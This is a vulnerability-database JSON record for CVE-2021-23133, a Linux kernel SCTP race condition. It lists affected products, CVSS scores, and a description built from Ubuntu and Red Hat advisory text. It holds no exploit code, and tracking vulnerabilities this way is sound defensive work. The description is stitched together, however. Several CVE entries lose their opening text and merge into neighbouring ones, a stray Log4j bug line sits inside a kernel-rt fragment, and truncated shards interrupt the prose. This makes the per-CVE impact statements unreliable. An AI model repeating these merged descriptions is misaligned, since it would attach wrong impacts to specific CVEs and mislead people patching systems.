                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.232",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163262"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2021-23133",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CVE-2021-23133",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "psirt@paloaltonetworks.com",
            "availabilityImpact": "HIGH",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 0.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-23133",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "psirt@paloaltonetworks.com",
            "id": "CVE-2021-23133",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-23133",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-23133"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A race condition in Linux kernel SCTP sockets (net/sctp/socket.c) before 5.12-rc8 can lead to kernel privilege escalation from the context of a network service or an unprivileged process. If sctp_destroy_sock is called without sock_net(sk)-\u003esctp.addr_wq_lock then an element is removed from the auto_asconf_splist list without any proper locking. This can be exploited by an attacker with network service privileges to escalate to root or from the context of an unprivileged user directly if a BPF_CGROUP_INET_SOCK_CREATE is attached which denies creation of some SCTP socket. ==========================================================================\nUbuntu Security Notice USN-4997-2\nJune 25, 2021\n\nlinux-kvm vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.04\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-kvm: Linux kernel for cloud environments\n\nDetails:\n\nUSN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-3609)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly enforce limits for pointer operations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-33200)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly clear received fragments from memory in some situations. A\nphysically proximate attacker could possibly use this issue to inject\npackets or expose sensitive information. (CVE-2020-24586)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled encrypted fragments. A physically proximate attacker\ncould possibly use this issue to decrypt fragments. (CVE-2020-24587)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled certain malformed frames. If a user were tricked into\nconnecting to a malicious server, a physically proximate attacker could use\nthis issue to inject packets. (CVE-2020-24588)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly verify certain fragmented frames. A physically proximate\nattacker could possibly use this issue to inject or decrypt packets. \n(CVE-2020-26141)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\naccepted plaintext fragments in certain situations. A physically proximate\nattacker could use this issue to inject packets. (CVE-2020-26145)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2021-23133)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nManfred Paul discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel contained an out-of-bounds\nvulnerability. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-31440)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). An attacker could use this\nissue to possibly execute arbitrary code. (CVE-2021-32399)\n\nIt was discovered that a use-after-free existed in the Bluetooth HCI driver\nof the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nIt was discovered that an out-of-bounds (OOB) memory access flaw existed in\nthe f2fs module of the Linux kernel. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nMathias Krause discovered that a null pointer dereference existed in the\nNitro Enclaves kernel driver of the Linux kernel. A local attacker could\nuse this issue to cause a denial of service or possibly execute arbitrary\ncode. (CVE-2021-3543)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.04:\n  linux-image-5.11.0-1009-kvm     5.11.0-1009.9\n  linux-image-kvm                 5.11.0.1009.9\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4997-2\n  https://ubuntu.com/security/notices/USN-4997-1\n  CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139,\n  CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133,\n  CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399,\n  CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543,\n  CVE-2021-3609\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9\n\n. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2021:4356-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:4356\nIssue date:        2021-11-09\nCVE Names:         CVE-2020-0427 CVE-2020-24502 CVE-2020-24503\n                   CVE-2020-24504 CVE-2020-24586 CVE-2020-24587\n                   CVE-2020-24588 CVE-2020-26139 CVE-2020-26140\n                   CVE-2020-26141 CVE-2020-26143 CVE-2020-26144\n                   CVE-2020-26145 CVE-2020-26146 CVE-2020-26147\n                   CVE-2020-27777 CVE-2020-29368 CVE-2020-29660\n                   CVE-2020-36158 CVE-2020-36386 CVE-2021-0129\n                   CVE-2021-3348 CVE-2021-3489 CVE-2021-3564\n                   CVE-2021-3573 CVE-2021-3600 CVE-2021-3635\n                   CVE-2021-3659 CVE-2021-3679 CVE-2021-3732\n                   CVE-2021-20194 CVE-2021-20239 CVE-2021-23133\n                   CVE-2021-28950 CVE-2021-28971 CVE-2021-29155\n                   CVE-2021-29646 CVE-2021-29650 CVE-2021-31440\n                   CVE-2021-31829 CVE-2021-31916 CVE-2021-33200\n====================================================================\n1. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64\n\n3. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427)\n* kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter\ndrivers (CVE-2020-24502)\n* kernel: Insufficient access control in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24503)\n* kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24504)\n* kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586)\n* kernel: Reassembling fragments encrypted under different keys\n(CVE-2020-24587)\n* kernel: wifi frame payload being parsed incorrectly as an L2 frame\n(CVE-2020-24588)\n* kernel: Forwarding EAPOL from unauthenticated wifi client\n(CVE-2020-26139)\n* kernel: accepting plaintext data frames in protected networks\n(CVE-2020-26140)\n* kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141)\n* kernel: accepting fragmented plaintext frames in protected networks\n(CVE-2020-26143)\n* kernel: accepting unencrypted A-MSDU frames that start with RFC1042\nheader (CVE-2020-26144)\n* kernel: accepting plaintext broadcast fragments as full frames\n(CVE-2020-26145)\n* kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n(CVE-2020-27777)\n* kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a\nread-after-free (CVE-2020-29660)\n* kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a\nlong SSID value (CVE-2020-36158)\n* kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt()\n(CVE-2020-36386)\n* kernel: Improper access control in BlueZ may allow information disclosure\nvulnerability. (CVE-2021-0129)\n* kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n(CVE-2021-3348)\n* kernel: Linux kernel eBPF RINGBUF map oversized allocation\n(CVE-2021-3489)\n* kernel: double free in bluetooth subsystem when the HCI device\ninitialization fails (CVE-2021-3564)\n* kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573)\n* kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600)\n* kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679)\n* kernel: Mounting overlayfs inside an unprivileged user namespace can\nreveal files (CVE-2021-3732)\n* kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n(CVE-2021-20194)\n* kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133)\n* kernel: fuse: stall on CPU can occur because a retry loop continually\nfinds the same bad inode (CVE-2021-28950)\n* kernel: System crash in intel_pmu_drain_pebs_nhm in\narch/x86/events/intel/ds.c (CVE-2021-28971)\n* kernel: protection can be bypassed to leak content of kernel memory\n(CVE-2021-29155)\n* kernel: improper input validation in tipc_nl_retrieve_key function in\nnet/tipc/node.c (CVE-2021-29646)\n* kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650)\n* kernel: local escalation of privileges in handling of eBPF programs\n(CVE-2021-31440)\n* kernel: protection of stack pointer against speculative pointer\narithmetic can be bypassed to leak content of kernel memory\n(CVE-2021-31829)\n* kernel: out-of-bounds reads and writes due to enforcing incorrect limits\nfor pointer arithmetic operations by BPF verifier (CVE-2021-33200)\n* kernel: reassembling encrypted fragments with non-consecutive packet\nnumbers (CVE-2020-26146)\n* kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147)\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n* kernel: flowtable list del corruption with kernel BUG at\nlib/list_debug.c:50 (CVE-2021-3635)\n* kernel: NULL pointer dereference in llsec_key_alloc() in\nnet/mac802154/llsec.c (CVE-2021-3659)\n* kernel: setsockopt System Call Untrusted Pointer Dereference Information\nDisclosure (CVE-2021-20239)\n* kernel: out of bounds array access in drivers/md/dm-ioctl.c\n(CVE-2021-31916)\n\n4. Solution:\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1509204 - dlm: Add ability to set SO_MARK on DLM sockets\n1793880 - Unreliable RTC synchronization (11-minute mode)\n1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10\n1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free\n1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value\n1915825 - Allow falling back to genfscon labeling when the FS doesn\u0027t support xattrs and there is a fs_use_xattr rule for it\n1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. \n1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure\n1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers\n1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers\n1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers\n1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with \u0027serverino\u0027 and \u0027cache=strict \u0027\n1939341 - CNB: net: add inline function skb_csum_is_sctp\n1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode\n1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c\n1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c\n1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS\n1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c\n1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del\n1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory\n1953847 - [ethtool] The `NLM_F_MULTI` should be used for `NLM_F_DUMP`\n1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. \n1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory\n1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation\n1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection\n1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys\n1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame\n1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client\n1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks\n1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames\n1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks\n1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header\n1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames\n1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers\n1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments\n1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h\n1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs\n1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails\n1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. \n1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls\n1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier\n1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()\n1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c\n1971101 - ceph: potential data corruption in cephfs write_begin codepath\n1972278 - libceph: allow addrvecs with a single NONE/blank address\n1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!\n1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]\n1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c\n1976679 - blk-mq: fix/improve io scheduler batching dispatch\n1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00\n1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50\n1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)\n1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame\n1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel\n1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level\n1977850 - geneve virtual devices lack  the NETIF_F_FRAGLIST feature\n1978369 - dm writecache: sync with upstream 5.14\n1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)\n1979680 - Backport openvswitch tracepoints\n1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod\n1986138 - Lockd invalid cast to nlm_lockowner\n1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()\n1989999 - ceph omnibus backport for RHEL-8.5.0\n1991976 - block: fix New warning in nvme_setup_discard\n1992700 - blk-mq: fix kernel panic when iterating over flush request\n1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files\n1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 